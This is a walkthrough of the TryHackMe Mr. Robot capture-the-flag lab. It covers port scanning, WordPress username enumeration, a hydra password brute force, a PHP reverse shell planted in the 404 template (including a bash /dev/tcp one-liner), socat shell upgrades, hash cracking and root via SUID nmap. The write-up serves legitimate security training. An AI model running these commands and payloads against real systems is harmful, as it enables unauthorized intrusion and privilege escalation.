TryHackMe Mr. Robot CTF

Welcome to my walkthrough of the Mr. Robot CTF on TryHackMe. I had a lot of fun with this machine and learned some new tricks.

First off, let's nmap the machine. I always scan all the ports first and then go back and scan the open ones for services.

nmap -T4 -p- 10.10.210.193

We can see that ports 80 and 443 are open and port 22 is closed. Let's see what services are behind them.

nmap -T4 -p 22,80,443 10.10.210.193

Looks like the web server is going to be the best option, so let's view it in our web browser. The site offers a few commands we can run; going through them will show you various dialogs.

Something to always check is the robots.txt file. This file tells search engines which pages they are not allowed to crawl, which makes it a common way to keep login pages out of search results. The downside for the site, but great for us, is that it can lead us straight to those pages.

We have a possible dictionary file and our first flag, visit https://10.10.210.193/key-1-of-3.txt and submit it to TryHackMe.

Also download the fsocity.dic by visiting https://10.10.219.193/fsocity.dic.

Let's look at the file fsocity.dic. First, let's see how many lines are in the file.

Alright, that's a ton of lines; I wonder if any of them are duplicates.

Great, that reduced our dictionary a lot, but where can we use it?
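As an added example (not from the original post), here is the line count and deduplication as a small shell script. fsocity.dic itself is not embedded; a six-line sample wordlist is constructed inline to stand in for it, and the output file name NewSample.dic is just the name used here.

```shell
#!/bin/sh
# Added example, not from the original post: count the lines in a wordlist and
# strip the duplicates. fsocity.dic is not embedded; a constructed sample stands in.

# Write a constructed six-line sample with three distinct words.
make_sample() {
  printf '%s\n' alpha beta alpha gamma beta alpha > "$1"
}

# Total line count, what `wc -l fsocity.dic` reports (tr strips BSD wc padding).
count_lines() {
  wc -l < "$1" | tr -d ' '
}

# Number of distinct lines, without writing a new file.
count_unique() {
  sort -u "$1" | wc -l | tr -d ' '
}

# Write the deduplicated list, keeping the first occurrence of each word in its
# original position; `sort -u` would also work but reorders the list.
dedupe_wordlist() {
  awk '!seen[$0]++' "$1" > "$2"
}

workdir=$(mktemp -d)
make_sample "$workdir/sample.dic"
dedupe_wordlist "$workdir/sample.dic" "$workdir/NewSample.dic"
echo "lines: $(count_lines "$workdir/sample.dic")"           # 6
echo "unique: $(count_unique "$workdir/sample.dic")"         # 3
echo "after dedupe: $(count_lines "$workdir/NewSample.dic")" # 3
```

The awk form is used for the written file because it preserves the order of the original list; if order does not matter, `sort -u fsocity.dic > NewFSociety.dic` does the same job in one step.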

I have installed Wappalyzer to view the various technologies in use on a page.

I wonder if there is a WordPress login page somewhere. We can make the guess that it's https://10.10.210.193/wp-admin.

Additionally, we can use gobuster to find the directory.

gobuster dir -u http://10.10.210.193 -w /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt

dir is the mode we want to run for directory/file brute forcing. -u is the URL we want to attack. -w is the wordlist.

Many wordlists are built into Kali at /usr/share/wordlists/

We can visit https://10.10.210.193/login.

This actually redirects us to wp-login.php, great! Now we just need a username; let's try some characters from Mr. Robot.

Looks like neither of these two is correct, but WordPress is suffering from a username enumeration vulnerability: for any username we try, the login error tells us whether it is valid or not. Let's try Elliot.

Alright, it looks like we have our username. Now maybe we can use fsocity.dic, or in my case NewFSociety.dic (with the duplicates removed). Let's use hydra to brute force the page.

hydra -l Elliot -P NewFSociety.dic 10.10.255.10 http-post-form "/wp-login:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=https%3A%2F%2F10.10.255.10%2Fwp-admin%2F&testcookie=1:S=302"

-l is for our username, Elliot, which we confirmed. -P is the dictionary of passwords. We give it the IP address and then say we want to run http-post-form, since we are making a POST request with our login.

The next part of the command says we are looking for a redirect to the wp-admin page, which indicates a successful login. The 302 at the end is the HTTP status code for a redirect, which happens upon a successful login.

NOTE: Halfway through, my machine started giving me an error when visiting wp-login.php: "Error establishing a database connection". I started up a new machine and the IP address is now.

Running hydra will take some time to find a successful login; I set a timer on my phone and added an hour once or twice while waiting for it to finish.

Let's log in and see what we can do. WordPress is written in PHP, so we should be able to get a reverse shell.

Once you log in, click on Appearance and then Editor. I chose the 404 Template, because it's something we can trigger by visiting a page that doesn't exist. Check for a PHP reverse shell. You can use PentestMonkey's PHP shell located at https://github.com/pentestmonkey/php-reverse-shell. Simply change the IP and port and then paste it into the editor between the <?php ... ?> tags.

Additionally, you can try a one-liner.

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/IPADDRESS/1337 0>&1'");?>

First start your netcat listener: nc -nlvp 1337

Visit a page that doesn't exist, such as /hacked, and you will be presented with a shell. Running whoami shows we are daemon.

Trying to run sudo -l says we don't have a tty present. Let's download socat and get a full tty. Alternatively, we could use python to upgrade the shell.

python -c 'import pty; pty.spawn("/bin/sh")'

This works, but let's use socat as another example. Download the binary and serve it from a python web server. First, copy socat into your current working directory.

which socat

This shows the directory it's in.

cp /usr/bin/socat .

Spin up the python server.

python -m SimpleHTTPServer 7777

Now, from our shell, move into /tmp and download the socat binary.

cd /tmp && wget http://IPADDRESS:7777/socat

Now upgrade your shell with socat.

First start a listener on your attacker machine.

socat file:`tty`,raw,echo=0 tcp-listen:7777

Now replace the IP with your attacker IP. Also make socat executable.

chmod +x socat

socat tcp-connect:IP:7777 exec:/bin/sh,pty,stderr,setsid,sigint,sane
socat tcp-connect:IP:7777 exec:/bin/bash,pty,stderr,setsid,sigint,sane

Now let's take a look at the user's home directory.

cd /home

ls

cd robot

We see the second flag and a file titled password.raw-md5.

Save the hash on your local Kali machine and run hashcat against it.

hashcat -a 0 -m 0 Robothash /usr/share/wordlists/rockyou.txt --force

We use straight attack mode (-a 0), give it -m 0 because it's an MD5 hash, and a wordlist. Finally, I use --force because I am in a virtual machine, which otherwise triggers errors.

At first I tried to ssh in with the user robot, but that didn’t work because port 22 is closed.

So simply run su robot in your shell and enter the password when prompted.

Sadly, we can't run sudo at all. If we could, maybe we could escalate privileges through a binary. I always turn to https://gtfobins.github.io/ to see how to escalate with various binaries, how to break out of restricted shells, and other tricks.

Let's look for any SUID binaries. Certain binaries need to be runnable by normal users but must execute with root privileges. Examples of this are passwd and ping. passwd needs root permissions to update /etc/shadow with the new password. ping needs root permissions in order to open a TCP socket.

Run find / -perm -u=s -type f 2>/dev/null to look for these special binaries.
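As an added example (not from the original post), here is the same SUID search turned into the check a defender would run on a box like this: list every SUID file under a root and report the ones missing from a baseline of the binaries expected on that build. The directory tree, the files, and the baseline file are all constructed for the demo; a real baseline would be captured from a known-good install.

```shell
#!/bin/sh
# Added example, not from the original post: the same SUID search turned into an
# audit. The tree, the files and the baseline are constructed for the demo; a real
# baseline would be captured from a known-good install of the same build.

# Regular files with the SUID bit set beneath $1, one per line, sorted.
list_suid() {
  find "$1" -perm -4000 -type f 2>/dev/null | sort
}

# SUID files beneath $1 whose full path is not listed in the baseline file $2.
# Anything printed is either a newly installed legitimate binary or, as with the
# SUID nmap on this box, something that needs investigating.
unexpected_suid() {
  list_suid "$1" | while IFS= read -r path; do
    grep -q -x -F -- "$path" "$2" || printf '%s\n' "$path"
  done
}

# Constructed demo tree: two expected SUID binaries, one unexpected, one plain file.
root=$(mktemp -d)
mkdir -p "$root/bin" "$root/opt"
for f in bin/ping bin/passwd opt/nmap opt/plain; do : > "$root/$f"; done
chmod 4755 "$root/bin/ping" "$root/bin/passwd" "$root/opt/nmap"
chmod 0755 "$root/opt/plain"
printf '%s\n' "$root/bin/ping" "$root/bin/passwd" > "$root/baseline.txt"

echo "SUID files not in baseline:"
unexpected_suid "$root" "$root/baseline.txt"   # prints only .../opt/nmap
```

On a real host you would run `unexpected_suid / /path/to/baseline.txt` and, as the post shows next, a SUID copy of a tool like nmap is exactly the kind of entry that should never be in the baseline.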

Most of these look normal, except nmap. While certain scans do require root privileges to run properly, a SUID nmap may let us get a root shell.

Nmap has an interactive mode that can actually give us this root shell. Looking at GTFOBins we can see how to escalate: https://gtfobins.github.io/gtfobins/nmap/

We can run nmap in interactive mode by running nmap --interactive.

Then we can spawn a shell using !sh. I tried to use !bash, but that didn’t spawn us a shell.

Run cd / and then cat key-3-of-3.txt.

Congratulations, we have rooted this machine. I hope you learned something new from this post!

Until next time continue HACKING THE PLANET!!!